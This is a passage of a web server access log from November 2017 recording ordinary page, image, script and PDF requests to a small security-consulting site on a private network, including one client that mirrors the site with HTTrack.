98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:01 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /products.html HTTP/1.1\" 200 7158 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26428 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38062 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.36 - - [12/Nov/2017:18:36:02 -0500] \"GET /products.html HTTP/1.1\" 200 7158 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:03 -0500] \"GET /consulting.html HTTP/1.1\" 200 7268 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:04 -0500] \"GET /resources.html HTTP/1.1\" 200 7568 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:05 -0500] \"GET /about.html HTTP/1.1\" 200 7041 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:06 -0500] \"GET /support.html HTTP/1.1\" 200 6207 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:07 -0500] \"GET /contact.html HTTP/1.1\" 200 6975 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.36 - - [12/Nov/2017:18:36:08 -0500] \"GET /request-quote.html HTTP/1.1\" 200 7325 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.36 - - [12/Nov/2017:18:36:09 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:10 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:11 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:12 -0500] \"GET /files/theme/images/default-bgaf0e.jpg?1509483497 HTTP/1.1\" 200 239379 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:13 -0500] \"GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1\" 200 1385 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:14 -0500] \"GET /files/theme/images/light-checkboxaf0e.png?1509483497 HTTP/1.1\" 200 1456 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:15 -0500] \"GET /files/theme/images/icon-bubbleaf0e.png?1509483497 HTTP/1.1\" 200 1584 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:16 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:17 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26427 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:18 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38062 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:19 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:20 -0500] \"GET /risk.html HTTP/1.1\" 200 6605 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:21 -0500] \"GET /incident.html HTTP/1.1\" 200 6620 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:23 -0500] \"GET /bcp.html HTTP/1.1\" 200 6650 \"http://192.168.0.35/products.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:25 -0500] \"GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1\" 200 120189 \"http://192.168.0.35/consulting.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:27 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/consulting.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:29 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47805 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:31 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7768 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:35 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20173 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:40 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:41 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45954 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:47 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:53 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1\" 200 1045140 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:55 -0500] \"GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1\" 200 265419 \"http://192.168.0.35/about.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:37:24 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45954 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:30 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1\" 200 765194 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.36 - - [12/Nov/2017:18:36:49 -0500] \"GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1\" 200 775341 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:36:51 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1\" 200 765194 \"http://192.168.0.35/resources.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:37:44 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/about.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:37:45 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/contact.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] \"GET /risk.html HTTP/1.1\" 200 6606 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] \"GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1\" 200 55344 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] \"GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1\" 200 174914 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.36 - - [12/Nov/2017:18:37:47 -0500] \"GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1\" 200 55344 \"http://192.168.0.35/risk.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:38:00 -0500] \"GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1\" 200 174914 \"http://192.168.0.35/risk.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:38:31 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/risk.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:38:32 -0500] \"GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1\" 200 99001 \"http://192.168.0.35/incident.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:38:49 -0500] \"GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1\" 200 59026 \"http://192.168.0.35/incident.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:39:01 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/incident.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:39:03 -0500] \"GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1\" 200 111182 \"http://192.168.0.35/bcp.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:39:05 -0500] \"GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1\" 200 57268 \"http://192.168.0.35/bcp.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:39:07 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/bcp.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43724 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45953 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:42:01 -0500] \"GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1\" 200 775340 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /products.html HTTP/1.1\" 200 7158 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 304 182 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 304 182 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 304 182 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /risk.html HTTP/1.1\" 200 6605 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1\" 200 55344 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] \"GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1\" 200 174913 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:15 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /contact.html HTTP/1.1\" 200 6975 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) 